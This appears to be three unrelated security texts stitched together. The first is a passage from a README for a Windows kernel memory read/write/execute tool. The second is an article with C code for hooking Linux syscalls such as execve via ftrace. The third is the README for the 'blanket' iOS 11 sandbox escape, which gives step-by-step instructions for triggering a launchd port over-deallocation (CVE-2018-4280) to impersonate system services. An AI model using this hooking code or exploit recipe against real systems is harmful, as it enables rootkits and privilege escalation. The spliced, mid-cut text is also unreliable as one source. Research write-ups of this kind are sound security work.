As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.

Usage

Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will lookup your installation path automatically, and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter which apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.

Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is an ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, it nearly doesn’t affect the system because the kernel knows where the calls mcount() or __fentry__() are located and replaces the machine code with nop (a specific instruction that does nothing) at an early stage. And when Linux kernel trace is on, ftrace calls are added back to the necessary functions.

Description of necessary functions

The following structure can be used for describing each hooked function:

 

/**
 * struct ftrace_hook    describes the hooked function
 *
 * @name:                the name of the hooked function
 *
 * @function:            the address of the wrapper function that will be called instead
 *                       of the hooked function
 *
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 *
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 *
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
 */
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;
        unsigned long address;
        struct ftrace_ops ops;
};

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:

 

#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
        }
static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),
};

This is what the hooked function wrapper looks like:

/*
 * It’s a pointer to the original system call handler execve().
 * It can be called from the wrapper. It’s extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to “asmlinkage”).
 */
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);
/*
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
 */
static asmlinkage long fh_sys_execve (const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address (struct ftrace_hook *hook)
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        }
        *((unsigned long*) hook->original) = hook->address;
        return 0;
}

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

 int fh_install_hook (struct ftrace_hook *hook)
        int err;
        err = resolve_hook_address(hook);
        if (err)
                return err;
        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;
        /* ... */
}

The fh_ftrace_thunk () feature is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they command ftrace to save and restore the processor registers whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

 int fh_install_hook (struct ftrace_hook *hook)
{
        /* ... */
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        }
        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);
                /* Don’t forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
                return err;
        }
        return 0;
}

To turn off the hook, we repeat the same actions in reverse:

 void fh_remove_hook (struct ftrace_hook *hook)
{
        int err;
        err = unregister_ftrace_function(&hook->ops);
        if (err)
                pr_debug("unregister_ftrace_function() failed: %d\n", err);
        }
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
        }
}

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

 static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        regs->ip = (unsigned long) hook->function;
}

We get the address of struct ftrace_hook for our function using a macro container_of() and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;
}

This approach has three main advantages:

  • Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command Is in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suggest that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Linux Kernel Function Tracing hooking

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel accomplishes all low-level tasks implemented on the assembler pretty fast and hands over control to the high-level do_syscall_64 () function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve ().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, there’s no such call.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Following the FTRACE_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next executed function — which leads to passing control to a new address.
  7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and returns control to the do_syscall_64() function.
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.

Conclusion

Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that ’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. There are several kernel requirements needed to ensure successful ftrace Linux kernel tracing:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead costs than kprobes. However, the overhead costs are higher than for splicing manually. In fact, dynamic ftrace is a variation of splicing which executes the unneeded ftrace code and other callbacks.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead costs and can disrupt the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction) so you can basically spring over ftrace.

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:

  • CONFIG_FTRACE
  • CONFIG_KALLSYMS

Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:

  • CONFIG_DYNAMIC_FTRACE_WITH_REGS

To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:

  • CONFIG_HAVE_FENTRY

While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support a 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but it’ll significantly boost the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

According to debugging, the system got stuck inside the hooked function. For some unknown reason, the parent_ip still pointed to the kernel instead of the function wrapper when calling the original function inside the ftrace callback. This launched an endless loop wherein ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;
}

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls are expanded into no-op. This printk-macro version is used for logging at the development stage. And since these logs pose no interest at the operating stage, the system simply cuts them out of the code automatically unless you activate the DEBUG macro. After that, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        return real_sys_execve(filename, argv, envp);
}

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace a function call instruction with a cheaper direct jump to the function’s body. This is what this call looks like in machine code:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq </fh_sys_execve>

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax </fh_sys_execve>

The first CALL instruction is the exact same __fentry__() call that the compiler inserts at the beginning of all functions. But after that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve call (via a pointer stored in memory) performed by the CALL instruction, which is followed by fh_sys_execve() with the help of the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize(«-fno-optimize-sibling-calls»)

For further hooking experiments, you can use the full kernel module code from GitHub.

Conclusion

While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allowentitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied bytask_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORTspecial port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASHexceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abortfunction.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASHexception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

